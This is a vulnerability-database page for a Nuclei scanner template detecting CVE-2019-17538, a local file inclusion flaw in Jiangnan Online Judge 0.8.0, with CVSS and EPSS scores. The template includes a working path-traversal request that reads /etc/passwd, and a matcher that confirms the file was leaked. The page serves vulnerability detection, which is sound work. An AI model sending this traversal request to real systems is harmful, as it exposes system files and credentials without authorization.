Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-17538
HistoryMar 01, 2021 - 11:29 a.m.

Jiangnan Online Judge 0.8.0 - Local File Inclusion

2021-03-0111:29:32
ProjectDiscovery
github.com
5
cve2019
jnoj
lfi
local file inclusion
sensitive information
system files
credentials
vulnerability
unauthorized access

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.008

Percentile

81.6%

Jiangnan Online Judge (aka jnoj) 0.8.0 is susceptible to local file inclusion via web/polygon/problem/viewfile?id=1&name=../.
id: CVE-2019-17538

info:
  name: Jiangnan Online Judge 0.8.0 - Local File Inclusion
  author: pussycat0x
  severity: high
  description: |
    Jiangnan Online Judge (aka jnoj) 0.8.0 is susceptible to local file inclusion via web/polygon/problem/viewfile?id=1&name=../.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including system files and credentials.
  remediation: |
    Upgrade Jiangnan Online Judge to a patched version or apply the necessary security patches to fix the Local File Inclusion vulnerability.
  reference:
    - https://github.com/shi-yang/jnoj/issues/53
    - https://nvd.nist.gov/vuln/detail/CVE-2019-17538
    - https://github.com/Elsfa7-110/kenzer-templates
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-17538
    cwe-id: CWE-22
    epss-score: 0.00811
    epss-percentile: 0.81728
    cpe: cpe:2.3:a:jnoj:jiangnan_online_judge:0.8.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: jnoj
    product: jiangnan_online_judge
  tags: cve2019,cve,jnoj,lfi

http:
  - raw:
      - |
        GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502203b57c5627b5a07724a21a5b6c66b29bdd3b1853f86c93f7c5d3d8c8cbcae1a09022100af469eb16537815f6a042aa9a7ad7a3bbc7a1e08d77315ae599b5df1c512a322:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.008

Percentile

81.6%

Related for NUCLEI:CVE-2019-17538